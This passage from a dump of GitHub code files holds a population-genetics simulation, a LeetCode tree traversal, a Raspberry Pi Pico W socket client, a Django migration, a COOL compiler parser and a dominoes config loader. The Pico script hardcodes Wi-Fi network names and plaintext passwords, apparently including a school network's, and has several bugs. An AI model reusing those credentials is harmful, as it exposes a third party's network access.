f8[:, ::1], f8[::1], f8[::1], f8[::1]), nopython=True)\ndef process_group_event(grpMat, grpMat2D, grpLUT, grpRate, rand):\n # get number of groups\n NGroup = grpMat2D.shape[1]\n\n # select random event based on propensity\n eventID = util.select_random_event(grpRate, rand[0])\n # get event type\n eventType = math.floor(eventID/NGroup)\n # get event group\n eventGroup = eventID % NGroup # % is modulo operator\n \n if eventType < 1:\n # fission event - add new group and split cells\n grpMat, grpMat2D, grpLUT = fission_group(grpMat, grpMat2D, grpLUT, eventGroup)\n else:\n # extinction event - remove group\n grpMat2D = remove_group(grpMat, grpMat2D, grpLUT, eventGroup)\n return (grpMat, grpMat2D, grpLUT)\n\n\n#calc group properties\n# calc total number of individuals per group, use matrix product for speed\n@jit(Tuple((f8[:, ::1], f8[::1], f8))(f8[:, :, :, ::1], f8[::1], f8[::1]), nopython=True)\ndef calc_group_state(grpMat, onesNType, onesNGrp):\n #matrix with number per type\n grpMat2D = grpMat.sum(axis=3).sum(axis=2)\n #vector with size of each group\n grSizeVec = onesNType @ grpMat2D\n #float total number of individuals\n NTot = onesNGrp @ grSizeVec\n\n return(grpMat2D, grSizeVec, NTot)\n\n\n\n\"\"\"============================================================================\nMain model code\n============================================================================\"\"\"\n\n# main model\ndef run_model(model_par):\n \n #create state variables\n stateVarPlus = stateVar + \\\n ['N%i' % x for x in range(model_par['indv_NType'])] + \\\n ['N%imut' % x for x in range(model_par['indv_NType'])]\n \n # get individual rates\n delta_indv = float(model_par['delta_indv'])\n indv_K = float(model_par['indv_K'])\n inv_migrR = float(model_par['indv_migrR'])\n NType = int(model_par['indv_NType'])\n mutR_type = float(model_par['mutR_type'])\n mutR_size = float(model_par['mutR_size'])\n mutR_frac = float(model_par['mutR_frac'])\n # get group rates\n gr_CFis = float(model_par['gr_CFis'])\n gr_SFis = float(model_par['gr_SFis']) / indv_K\n K_grp = float(model_par['K_grp'])\n K_tot = float(model_par['K_tot'])\n delta_grp = float(model_par['delta_grp'])\n delta_tot = float(model_par['delta_tot'])\n delta_size = float(model_par['delta_size'])\n indv_tau = float(model_par['indv_tau'])\n\n # Initialize model, get rates and init matrices\n maxT, minT, sampleInt, mavInt, rmsInt = mls.calc_time_steps(model_par)\n \n # init counters\n currT = 0\n ttR = 0\n sampleIdx = 0\n \n # get matrix with random numbers\n rndSize1 = 7\n rndSize0 = int(1E6)\n randMat = util.create_randMat(rndSize0, rndSize1)\n \n # initialize outputMat matrix\n outputMat, traitDistr = init_outputMat_matrix(model_par)\n\n #init static helper vectors\n onesNType, birthRVec, deathR = mls.adjust_indv_rates(model_par)\n \n # initialize group matrix\n grpMat, grpMat2D, grpLUT = init_grpMat(model_par)\n NGroup = grpMat2D.shape[1]\n\n #init dynamic helper vectors\n onesNGrp, onesIndR, onesGrR, indvRate, grpRate = mls.create_helper_vector(\n NGroup, NType)\n\n # get first sample of init state\n sampleIdx = sample_model(grpMat, grpMat2D, grpLUT, \n outputMat, traitDistr, \n sampleIdx, currT, mavInt, rmsInt, \n stateVarPlus)\n\n # loop time steps\n while currT <= maxT:\n # reset rand matrix when used up\n if ttR >= rndSize0:\n randMat = util.create_randMat(rndSize0, rndSize1)\n ttR = 0 \n\n #calc group state\n grSizeVec, NTot = mls.calc_group_state(grpMat2D, \n onesNType, onesNGrp) \n\n # calc rates of individual level events\n mls.calc_indv_rates(indvRate, grpMat2D, grSizeVec, birthRVec,\n deathR, delta_indv, NType, NGroup)\n \n \n # calc rates of group events\n mls.calc_group_rates(grpRate, grpMat2D, grSizeVec, NTot, NGroup,\n gr_CFis, gr_SFis, K_grp, K_tot,\n delta_grp, delta_tot, delta_size)\n\n # calculate total propensities\n indvProp = indv_tau * (onesIndR @ indvRate)\n grpProp = onesGrR @ grpRate\n migrProp = inv_migrR * NTot\n totProp = indvProp + grpProp + migrProp\n\n # calc time step\n dt = -1 * math.log(randMat[ttR, 1]) / totProp\n\n # select group or individual event\n rescaledRand = randMat[ttR, 0] * totProp\n groupsHaveChanged = False\n if rescaledRand < indvProp:\n # individual level event - select and process individual level event\n groupDeathID = process_indv_event(grpMat, grpMat2D, grpLUT, indvRate, \n randMat[ttR, 2:7], NType, NGroup, \n mutR_type, mutR_size, mutR_frac)\n if groupDeathID > -1: # remove empty group\n grpMat2D = remove_group(grpMat, grpMat2D, grpLUT, groupDeathID)\n groupsHaveChanged = True\n elif rescaledRand < (indvProp + migrProp):\n # migration event - select and process migration event\n groupDeathID = process_migration_event(grpMat, grpMat2D, grpLUT, grSizeVec, \n NGroup, NType, randMat[ttR, 2:6])\n if groupDeathID > -1: # remove empty group\n grpMat2D = remove_group(grpMat, grpMat2D, grpLUT, groupDeathID)\n groupsHaveChanged = True\n else:\n # group level event - select and process group level event\n grpMat, grpMat2D, grpLUT= process_group_event(grpMat, grpMat2D, grpLUT, grpRate, randMat[ttR, 2:4])\n groupsHaveChanged = True\n \n # update group matrices if needed \n if groupsHaveChanged:\n NGroup = grpMat2D.shape[1]\n if NGroup > 0: #update group matrices\n onesNGrp, onesIndR, onesGrR, indvRate, grpRate = mls.create_helper_vector(\n NGroup, NType) \n else: #otherwise, if all groups have died, end simulation\n sampleIdx = sample_extinction(outputMat, traitDistr, sampleIdx, currT, stateVarPlus)\n print('System has gone extinct')\n break\n\n # update time\n currT += dt\n ttR += 1\n # sample model at intervals\n nextSampleT = sampleInt * sampleIdx\n if currT >= nextSampleT:\n sampleIdx = sample_model(grpMat, grpMat2D, grpLUT, \n outputMat, traitDistr, \n sampleIdx, currT, mavInt, rmsInt, \n stateVarPlus)\n \n # cut off non existing time points at end\n outputMat = outputMat[0:sampleIdx]\n traitDistr = traitDistr[0:sampleIdx, :, :]\n \n if outputMat['NCoop'][-1] == 0:\n outputMat['NCoop_mav'][-1] = 0\n \n return (outputMat, traitDistr)\n\n\n\"\"\"============================================================================\nCode that calls model and plots results\n============================================================================\"\"\"\n\ndef single_run_save(model_par, mainName):\n \"\"\"[Runs evolution model and saves results to disk in .npz file]\n \n Arguments:\n model_par {[dictionary]} -- [model parameters] \n \n mainName {[string]} -- [filename for data file, appended with parameter settings]\n Returns:\n [numpy 2D array] -- [trait distribution at last timepoint]\n \"\"\"\n #create file name, append mainName with parameter settings\n parNameAbbrev = {\n 'delta_indv' : 'dInd',\n 'delta_grp' : 'dGrp',\n 'delta_tot' : 'dTot',\n 'delta_size' : 'dSiz',\n 'gr_CFis' : 'fisC',\n 'gr_SFis' : 'fisS',\n 'alpha_Fis' : 'fisA',\n 'indv_NType' : 'nTyp', \n 'indv_asymmetry': 'asym',\n 'indv_cost' : 'cost', \n 'mutR_type' : 'muTy', \n 'mutR_size' : 'muSi', \n 'mutR_frac' : 'muFr', \n 'indv_migrR' : 'migR', \n 'indv_K' : 'kInd', \n 'K_grp' : 'kGrp', \n 'K_tot' : 'kTot',\n 'offspr_sizeInit':'siIn',\n 'offspr_fracInit':'frIn',\n 'indv_tau' : 'tInd'}\n \n parListName = ['gr_SFis', 'indv_cost', 'mutR_type',\n 'mutR_size', 'mutR_frac', 'offspr_sizeInit',\n 'offspr_fracInit', 'indv_K',\n 'indv_migrR','indv_tau']\n parName = ['_%s%.0g' %(parNameAbbrev[x], model_par[x]) for x in parListName]\n parName = ''.join(parName)\n fileName = mainName + parName + '.npz'\n \n #run model and save data to disk\n try: \n outputMat, traitDistr = run_model(model_par) \n np.savez(fileName, output=outputMat, traitDistr=traitDistr,\n model_par=[model_par])\n except:\n print(\"error with run\")\n traitDistr = np.full((1, nBinOffsprFrac, nBinOffsprSize), np.nan)\n \n return traitDistr\n \n\n# this piece of code is run only when this script is executed as the main\nif __name__ == \"__main__\":\n print(\"running with default parameter\")\n\n model_par = {\n #time and run settings\n \"maxT\": 30, # total run time\n \"maxPopSize\": 0, #stop simulation if population exceeds this number\n \"minT\": 10, # min run time\n \"sampleInt\": 1, # sampling interval\n \"mav_window\": 5, # average over this time window\n \"rms_window\": 5, # calc rms change over this time window\n \"rms_err_trNCoop\": 0, # when to stop calculations\n \"rms_err_trNGr\": 0, # when to stop calculations\n # settings for initial condition\n \"init_groupNum\": 300, # initial # groups\n \"init_fCoop\": 1,\n \"init_groupDens\": 20, # initial total cell number in group\n # settings for individual level dynamics\n # complexity\n \"indv_NType\": 2,\n \"indv_asymmetry\": 1, # difference in growth rate b(j+1) = b(j) / asymmetry\n # mutation load\n \"indv_cost\": 0.01, # cost of cooperation\n \"indv_migrR\": 0, # mutation rate to cheaters\n # set mutation rates\n 'mutR_type': 1E-3,\n 'mutR_size': 2E-2, \n 'mutR_frac': 2E-2, \n # group size control\n \"indv_K\": 100, # total group size at EQ if f_coop=1\n \"delta_indv\": 1, # zero if death rate is simply 1/k, one if death rate decreases with group size\n # setting for group rates\n # fission rate\n 'gr_CFis': 1/100,\n 'gr_SFis': 4,\n 'indv_tau': 0.1,\n # extinction rate\n 'delta_grp': 0, # exponent of denisty dependence on group #\n 'K_grp': 0, # carrying capacity of groups\n 'delta_tot': 1, # exponent of denisty dependence on total #indvidual\n 'K_tot': 5000, # carrying capacity of total individuals\n 'delta_size': 0, # exponent of size dependence\n # initial settings for fissioning\n 'offspr_sizeInit': 0.05, # offspr_size <= 0.5 and\n 'offspr_fracInit': 0.9 # offspr_size < offspr_frac < 1-offspr_size'\n }\n \n start = time.time()\n outputMat, traitDistr = run_model(model_par) \n end = time.time()\n print(end - start)\n print('done')\n","repo_name":"simonvanvliet/MLS_FragmentationModes","sub_path":"python_model_code/mainCode/MlsGroupDynamics_evolve.py","file_name":"MlsGroupDynamics_evolve.py","file_ext":"py","file_size_in_byte":31463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6355571043","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\"\"\"\nGiven a binary tree, return the inorder traversal of its nodes' values.\n\nFor example:\nGiven binary tree {1,#,2,3},\n 1\n \\\n 2\n /\n 3\nreturn [1,3,2].\n\nNote: Recursive solution is trivial, could you do it iteratively?\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.\n\n\"\"\"\n\nclass Solution(object):\n def inorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n r_list = []\n if root is None:\n return r_list\n \n node_stack = [root.right, root, root.left]\n label_stack = [False, True, False]\n while len(node_stack)>=1:\n node = node_stack.pop()\n label = label_stack.pop()\n if node is None:\n continue\n \n if label:\n r_list.append(node.val)\n else:\n node_stack.append(node.right)\n node_stack.append(node)\n node_stack.append(node.left)\n label_stack.append(False)\n label_stack.append(True)\n label_stack.append(False)\n return r_list\n \n ","repo_name":"mountlovestudy/leetcode","sub_path":"BinaryTreeInorderTraversal.py","file_name":"BinaryTreeInorderTraversal.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9003117388","text":"import usocket as socket\nimport machine\nfrom machine import Pin, ADC, PWM\nimport uasyncio as aio\nimport network\nimport os\nimport sys\nimport time\n\nIP = \"192.168.1.241\"\nPORT = \"19\"\nSSID = \"Da Snifs\"\nPASSWORD = \"11111111\"\n\nNAME = \"Raspberry Pi Pico\"\n\n# IP = \"10.3.5.60\"\n# PORT = \"19\"\n# SSID = \"LVISD Student\"\n# PASSWORD = \"!V1k1ng$R0w1ng!\"\n\n# Use big encoding to get a unique ID for the Pico\nUID = int.from_bytes(machine.unique_id(), \"big\")\nprint(NAME)\nprint(UID)\n\nBUFFSIZE = 4096\n\nRUN = True\n\noutput = None\n\nprocessFunc = None\n\nif IP == \"\" or PORT == \"\":\n selfNet = network.WLAN(network.AP_IF)\n selfNet.config(ssid=NAME, security=0, txpower=-60)\n selfNet.active(True)\n print(selfNet.ifconfig())\n site = usocket.socket(usocket.AF_INET, usocket.SOCK_STREAM)\n site.setsockopt(usocket.SOL_SOCKET, usocket.SO_REUSEADDR, 1)\n site.bind(('', 80))\n site.listen(5)\n\n html = \"\"\"\n\n \n \n Setup\n \n \n \n

Welcome to Javascape!

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n \n
\n \n \n\n\"\"\"\n while True:\n conn, addr = site.accept()\n\n conn.sendall(html)\n\n # print('Got a connection from %s' % str(addr))\n request = conn.recv(1024)\n request = str(request)\n # print('Content = %s' % request)\n\n argsIndex = request.find(\"/?\") + 2\n argsEndIndex = request.find(\"HTTP\") - 1\n request = request[argsIndex:argsEndIndex]\n requestargs = request.split(\"&\")\n print(requestargs)\n if (len(requestargs) == 5) and requestargs[0][3:] != \"\" and requestargs[1][5:] != \"\" and requestargs[2][5:] != \"\" and requestargs[3][9:] != \"\" and requestargs[4][3:] != \"\":\n response = \"Thank You!\"\n conn.sendall(response)\n conn.close()\n site.close()\n break\n\nwirelessNet = network.WLAN(network.STA_IF)\nwirelessNet.active(True)\nwirelessNet.connect(SSID, PASSWORD)\n\n#time.sleep(1)\n\nif not wirelessNet.isconnected():\n print(\"No connection\")\n\npins = []\nfor i in range(29):\n if i is not 23 or i is not 24 or i is not 25:\n if i is 26 or i is 27 or i is 28:\n pins.append(ADC(Pin(i)))\n else:\n pins.append(Pin(int(i), Pin.OUT, value=0))\n else:\n pins.append(Pin())\n\n# TODO: Check if socket is still active, if not, then close the socket and restart the connection\n\n\ndef process(data):\n if len(data) == 0:\n print(\"No data\")\n return\n print(data)\n args = data.split(\" \")\n\n if args[0] == \"getInfo\":\n return \"type 2 \" + str(UID) + \" Pico_W\"\n\n elif args[0] == \"set\":\n if (args[1] == \"LED\"):\n Pin(\"LED\", Pin.OUT, value=int(args[2]))\n return \"Set LED to \" + args[2]\n else:\n Pin(int(args[1]), Pin.OUT, value=int(args[2]))\n return \"Set pin \" + args[1] + \" to \" + args[2]\n elif args[0] == \"setAnalog\":\n pins[int(args[1])] = ADC(Pin(int(args[1])))\n elif args[0] == \"getAllAnalog\":\n n = \"analogValues\"\n\n n = n + \" 26:\" + str(pins[26].read_u16())\n n = n + \" 27:\" + str(pins[27].read_u16())\n n = n + \" 28:\" + str(pins[28].read_u16())\n print(n)\n\n elif args[0] == \"get\":\n if (args[1] == \"LED\"):\n return Pin(\"LED\").value\n else:\n return Pin(int(args[1])).value\n\n elif args[0] == \"setAll\":\n for i in range(int(args[1])):\n n = args[2+i].split(\":\")\n if i is not 23 or i is not 24 or i is not 25:\n if n[0] == \"0\":\n pins.append(Pin(\n int(i), Pin.OUT, value=int(n[1])))\n elif n[0] == \"1\":\n pins.append(Pin(int(i), Pin.IN))\n elif n[0] == \"2\":\n pins.append(ADC(Pin(int(args[1]))))\n else:\n pins.append(Pin())\n return \"finished setAll\"\n elif args[0] == \"getAll\":\n n = \"\"\n for i in range(len(pins)):\n n = n + str(pins[i].value())\n print(n)\n return \"Unrecognized command\"\n\n# The main thread\n\n\nasync def run():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # sock = socket.socket()\n\n def close():\n machine.Pin(\"LED\", machine.Pin.OUT, value=0)\n print(\"Socket closed\")\n\n # Attempt a connection to the server\n try:\n print(\"Connecting to \" + IP + \":\" + PORT)\n server = socket.getaddrinfo(IP, int(PORT))[0][-1]\n sock.connect(server)\n print(\"Connected\")\n except OSError as e:\n print(\"Socket error: \" + str(e))\n sock.close()\n return\n\n while True:\n sreader = aio.StreamReader(sock)\n swriter = aio.StreamWriter(sock, {})\n\n while True:\n try:\n input = (await sreader.readline())[:-2]\n input = input.decode(\"utf-8\")\n output = process(input) + \" \\n\"\n print(\"Sending: \" + output[:-2])\n # sock.sendall(bytes(output, \"utf-8\"))\n swriter.write(output.encode(\"utf-8\"))\n await swriter.drain()\n print(\"Sent\")\n if len(pins) >= 26:\n print(pins[26].read_u16())\n\n except OSError as e:\n close()\n return\n await aio.sleep(1)\n\ntry:\n aio.run(run())\nexcept KeyboardInterrupt:\n print(\"Keyboard interrupt\")\nfinally:\n _ = aio.new_event_loop()\n print(\"Done\")\n\n\n# n = machine.Pin(\"LED\", machine.Pin.OUT, value=1)","repo_name":"MrSmarty/GT_SHOWCASE_2022-2023-JavaScape-","sub_path":"PicoReciever/picoRecieving2.py","file_name":"picoRecieving2.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"8321907333","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('recipes', '0003_auto_20151128_1408'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='chef',\n name='age',\n field=models.IntegerField(verbose_name=[django.core.validators.MinValueValidator(6), django.core.validators.MaxValueValidator(120)]),\n ),\n migrations.AlterField(\n model_name='chef',\n name='experience',\n field=models.CharField(max_length=1, choices=[(b'B', b'Beginner'), (b'A', b'Advanced'), (b'E', b'Expert'), (b'M', b'Magical')]),\n ),\n ]\n","repo_name":"tomkra/django-recipes-app","sub_path":"recipes/migrations/0004_auto_20151128_1411.py","file_name":"0004_auto_20151128_1411.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"23496487688","text":"import os\nfrom sly import Parser\nfrom coolpyler.lexer import CoolLexer\nfrom coolpyler.errors import UnexpectedEOFError, UnexpectedTokenError\nfrom coolpyler.ast.cool import (\n CoolAssignNode,\n CoolAttrDeclNode,\n CoolBlockNode,\n CoolBoolNode,\n CoolCaseNode,\n CoolCaseOfNode,\n CoolClassNode,\n CoolDispatchNode,\n CoolDivNode,\n CoolEqNode,\n CoolFormalNode,\n CoolFuncDeclNode,\n CoolIfThenElseNode,\n CoolIntNode,\n CoolIsVoidNode,\n CoolLeNode,\n CoolLeqNode,\n CoolLetDeclNode,\n CoolLetInNode,\n CoolMinusNode,\n CoolMultNode,\n CoolNewNode,\n CoolNotNode,\n CoolParenthNode,\n CoolPlusNode,\n CoolProgramNode,\n CoolStaticDispatchNode,\n CoolStringNode,\n CoolTildeNode,\n CoolVarNode,\n CoolWhileNode,\n)\n\n# pyright: reportUndefinedVariable=false\n# flake8: noqa\n\nDEBUG = True\n\n\nclass CoolLogger(object):\n def __init__(self, f=None):\n if f is None:\n f = open(os.devnull, \"w\")\n self.f = open(f, \"w\") if isinstance(f, str) else f\n\n def debug(self, msg, *args, **kwargs):\n self.f.write((msg % args) + \"\\n\")\n\n info = debug\n\n def warning(self, msg, *args, **kwargs):\n self.f.write(\"WARNING: \" + (msg % args) + \"\\n\")\n\n def error(self, msg, *args, **kwargs):\n self.f.write(\"ERROR: \" + (msg % args) + \"\\n\")\n\n critical = debug\n\n\nclass CoolParser(Parser):\n log = CoolLogger(\"parser.log\" if DEBUG else None)\n debugfile = \"parser.out\" if DEBUG else None\n\n tokens = CoolLexer.tokens - {\"INLINE_COMMENT\", \"OCOMMENT\"}\n\n precedence = (\n (\"left\", \"DOT\"),\n (\"left\", \"AT\"),\n (\"right\", \"TILDE\"),\n (\"right\", \"ISVOID\"),\n (\"left\", \"STAR\", \"SLASH\"),\n (\"left\", \"PLUS\", \"MINUS\"),\n (\"nonassoc\", \"LEQ\", \"LE\", \"EQ\"),\n (\"right\", \"NOT\"),\n (\"right\", \"LEFT_ARROW\"),\n # (\"right\", \"IN\"),\n )\n\n def __init__(self, errors=None):\n if errors is None:\n errors = []\n self.errors = errors\n\n @_(\"cool_class SEMICOLON { cool_class SEMICOLON }\")\n def program(self, p):\n classes = [p.cool_class0] + p.cool_class1\n return CoolProgramNode(classes)\n\n @_(\"CLASS TYPE_ID [ INHERITS TYPE_ID ] OCURLY { feature SEMICOLON } CCURLY\")\n def cool_class(self, p):\n name, parent, features = p.TYPE_ID0, p.TYPE_ID1, p.feature\n return CoolClassNode(name, features, parent=parent)\n\n @_(\"OBJECT_ID COLON TYPE_ID [ LEFT_ARROW expr ]\")\n def feature(self, p):\n id, type, expr = p.OBJECT_ID, p.TYPE_ID, p.expr\n return CoolAttrDeclNode(id, type, expr)\n\n @_(\"OBJECT_ID OPAR [ formal_list ] CPAR COLON TYPE_ID OCURLY expr CCURLY\")\n def feature(self, p):\n id = p.OBJECT_ID\n params = p.formal_list if p.formal_list is not None else []\n type, body = p.TYPE_ID, p.expr\n return CoolFuncDeclNode(id, params, type, body)\n\n @_(\"formal { COMMA formal }\")\n def formal_list(self, p):\n return [p.formal0] + p.formal1\n\n @_(\"OBJECT_ID COLON TYPE_ID\")\n def formal(self, p):\n id, type = p.OBJECT_ID, p.TYPE_ID\n return CoolFormalNode(id, type)\n\n @_(\"OBJECT_ID LEFT_ARROW expr\")\n def expr(self, p):\n id, expr = p.OBJECT_ID, p.expr\n return CoolAssignNode(id, expr)\n\n @_(\"expr AT TYPE_ID DOT OBJECT_ID OPAR [ arg_list ] CPAR\")\n def expr(self, p):\n expr, type, id = p.expr, p.TYPE_ID, p.OBJECT_ID\n args = p.arg_list if p.arg_list is not None else []\n return CoolStaticDispatchNode(expr, type, id, args)\n\n @_(\"expr DOT OBJECT_ID OPAR [ arg_list ] CPAR\")\n def expr(self, p):\n expr, id = p.expr, p.OBJECT_ID\n args = p.arg_list if p.arg_list is not None else []\n return CoolDispatchNode(id, args, expr=expr)\n\n @_(\"OBJECT_ID OPAR [ arg_list ] CPAR\")\n def expr(self, p):\n id = p.OBJECT_ID\n args = p.arg_list if p.arg_list is not None else []\n return CoolDispatchNode(id, args)\n\n @_(\"expr { COMMA expr }\")\n def arg_list(self, p):\n return [p.expr0] + p.expr1\n\n @_(\"IF expr THEN expr ELSE expr FI\")\n def expr(self, p):\n cond, then_expr, else_expr = p.expr0, p.expr1, p.expr2\n return CoolIfThenElseNode(cond, then_expr, else_expr)\n\n @_(\"WHILE expr LOOP expr POOL\")\n def expr(self, p):\n cond, body = p.expr0, p.expr1\n return CoolWhileNode(cond, body)\n\n @_(\"OCURLY expr SEMICOLON { expr SEMICOLON } CCURLY\")\n def expr(self, p):\n expr_list = [p.expr0] + p.expr1\n return CoolBlockNode(expr_list)\n\n @_(\"LET let_decl { COMMA let_decl } IN expr\")\n def expr(self, p):\n decl_list = [p.let_decl0] + p.let_decl1\n expr = p.expr\n return CoolLetInNode(decl_list, expr)\n\n @_(\"OBJECT_ID COLON TYPE_ID [ LEFT_ARROW expr ]\")\n def let_decl(self, p):\n id, type, expr = p.OBJECT_ID, p.TYPE_ID, p.expr\n return CoolLetDeclNode(id, type, expr=expr)\n\n @_(\"CASE expr OF case SEMICOLON { case SEMICOLON } ESAC\")\n def expr(self, p):\n expr = p.expr\n case_list = [p.case0] + p.case1\n return CoolCaseOfNode(expr, case_list)\n\n @_(\"OBJECT_ID COLON TYPE_ID RIGHT_ARROW expr\")\n def case(self, p):\n id, type, expr = p.OBJECT_ID, p.TYPE_ID, p.expr\n return CoolCaseNode(id, type, expr)\n\n @_(\"NEW TYPE_ID\")\n def expr(self, p):\n type = p.TYPE_ID\n return CoolNewNode(type)\n\n @_(\"OPAR expr CPAR\")\n def expr(self, p):\n expr = p.expr\n return CoolParenthNode(expr)\n\n @_(\"ISVOID expr\")\n def expr(self, p):\n expr = p.expr\n return CoolIsVoidNode(expr)\n\n @_(\"TILDE expr\")\n def expr(self, p):\n expr = p.expr\n return CoolTildeNode(expr)\n\n @_(\"NOT expr\")\n def expr(self, p):\n expr = p.expr\n return CoolNotNode(expr)\n\n @_(\"expr PLUS expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolPlusNode(left_expr, right_expr)\n\n @_(\"expr MINUS expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolMinusNode(left_expr, right_expr)\n\n @_(\"expr STAR expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolMultNode(left_expr, right_expr)\n\n @_(\"expr SLASH expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolDivNode(left_expr, right_expr)\n\n @_(\"expr LE expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolLeNode(left_expr, right_expr)\n\n @_(\"expr LEQ expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolLeqNode(left_expr, right_expr)\n\n @_(\"expr EQ expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolEqNode(left_expr, right_expr)\n\n @_(\"OBJECT_ID\")\n def expr(self, p):\n return CoolVarNode(p.OBJECT_ID)\n\n @_(\"INT\")\n def expr(self, p):\n value = p.INT\n return CoolIntNode(value)\n\n @_(\"STRING\")\n def expr(self, p):\n value = p.STRING\n return CoolStringNode(value)\n\n @_(\"TRUE\")\n def expr(self, p):\n value = p.TRUE\n return CoolBoolNode(value)\n\n @_(\"FALSE\")\n def expr(self, p):\n value = p.FALSE\n return CoolBoolNode(value)\n\n # error rules\n # TODO: parser recovery and resynchronization with error rules\n\n def error(self, token):\n if token is None:\n self.errors.append(UnexpectedEOFError())\n else:\n self.errors.append(\n UnexpectedTokenError(\n token.lineno, token.columnno, f\"({token.type}, {token.value})>\"\n )\n )\n","repo_name":"RodrigoGarcia43/cool-compiler-2021","sub_path":"src/coolpyler/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"7152419073","text":"from pygame import *\nfrom gloss import *\n\nfrom tools import *\n\nimport os\nimport ConfigParser\n\ndef load_config():\n \"\"\" @brief loads a config dictionary\n \n This function reads game configuration from a file. It tries to read config\n from file, if does not exists (first execution) it creates a new file with\n default config.\n \"\"\"\n file = \"config.ini\"\n\n config = ConfigParser.RawConfigParser()\n\n if not os.path.exists(file):\n # file does not exist, so lets create it\n config.add_section('General')\n config.set('General', 'name', 'Dominous')\n config.set('General', 'window_caption', 'Dominous, an open source dominoes simulator')\n config.set('General', 'lang', 'en')\n config.set('General', 'points_per_game', '200')\n config.add_section('Screen')\n config.set('Screen', 'window_width', '800')\n config.set('Screen', 'window_height', '600')\n config.set('Screen', 'full_screen', 'False')\n config.set('Screen', 'window_favicon', os.path.join('images', 'favicon.png'))\n config.add_section('Theme')\n config.set('Theme', 'theme', 'spanish')\n config.add_section('Game')\n config.set('Game', 'player2', 'easy')\n config.set('Game', 'player3', 'easy')\n config.set('Game', 'player4', 'easy')\n # writing our configuration file to file\n with open(file, 'wb') as configfile:\n config.write(configfile)\n\n # load file\n config = ConfigParser.RawConfigParser()\n config.read(file)\n config_default = {\n 'name': config.get('General', 'name'),\n 'window_caption': config.get('General', 'window_caption'),\n 'window_width': config.getint('Screen', 'window_width'),\n 'window_height': config.getint('Screen', 'window_height'),\n 'full_screen': config.get('Screen', 'full_screen'),\n 'window_favicon': config.get('Screen', 'window_favicon'),\n 'tile_width': 525,\n 'tile_height': 270,\n 'scale': 0.2,\n 'theme': config.get('Theme', 'theme'),\n 'lang': config.get('General', 'lang'),\n 'points_per_game': config.get('General', 'points_per_game'),\n 'gametype': 'human',\n 'gametype_current': 'single',\n 'player1': 'easy',\n 'player2': 'easy',\n 'player3': 'easy',\n 'player4': 'easy',\n 'speed': '1',\n }\n return config_default\n\ndef save_config(config_new):\n config = ConfigParser.RawConfigParser()\n config.add_section('General')\n config.set('General', 'name', 'Dominous')\n config.set('General', 'window_caption', 'Dominous, an open source dominoes simulator')\n config.set('General', 'lang', config_new['lang'])\n config.set('General', 'points_per_game', config_new['points_per_game'])\n config.add_section('Screen')\n config.set('Screen', 'window_width', config_new['window_width'])\n config.set('Screen', 'window_height', config_new['window_height'])\n config.set('Screen', 'full_screen', config_new['full_screen'])\n config.set('Screen', 'window_favicon', os.path.join('images', 'favicon.png'))\n config.add_section('Theme')\n config.set('Theme', 'theme', config_new['theme'])\n # writing our configuration file to file\n with open(\"config.ini\", 'wb') as configfile:\n config.write(configfile)\n\nconfig = load_config()\n","repo_name":"3oheme/dominous","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"23420965942","text":"import json\nimport os\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom Lib import Security\nimport config\n\nclass ExpDA:\n \"\"\"description of class\"\"\"\n \n def getExpHash(exp):\n return Security.GenerateMD5(exp.results)\n\n def generateViolinPlots(exp, forceCreate = False):\n md5Name = ExpDA.getExpHash(exp)\n \n rd = json.loads(exp.results)\n methods = sorted(list(rd.keys()))\n\n \n compPath = config.plotsPath+md5Name+'/'\n if os.path.exists(compPath+'done.confirm') and not forceCreate:\n return md5Name\n \n\n mesMtdData = {}\n perDsMtdData = {}\n \n measures = None\n\n datasets = None\n\n PerMeasureMethods = {}\n\n for method in methods:\n mesMtdData = {}\n if datasets == None:\n datasets = sorted(list(rd[method].keys()))\n \n if measures == None:\n measures = sorted(list(rd[method][datasets[0]]['measures'].keys()))\n \n for m in measures:\n mesMtdData[m] = []\n if m not in PerMeasureMethods:\n PerMeasureMethods[m] = {}\n PerMeasureMethods[m][method] = []\n for m in measures:\n for ds in datasets:\n mesMtdData[m]+=rd[method][ds]['measures'][m]\n PerMeasureMethods[m][method]+=rd[method][ds]['measures'][m]\n\n \n fig,ax = plt.subplots(ncols = 1,nrows = 1,figsize=(10,3))\n fig.tight_layout() \n ax.set_ylim([0, 1])\n ax.set_xlim([0,len(mesMtdData.keys())+1])\n ax.set_xticks([i+1 for i in range(len(mesMtdData.keys()))])\n\n ax.set_title(\"Measures for 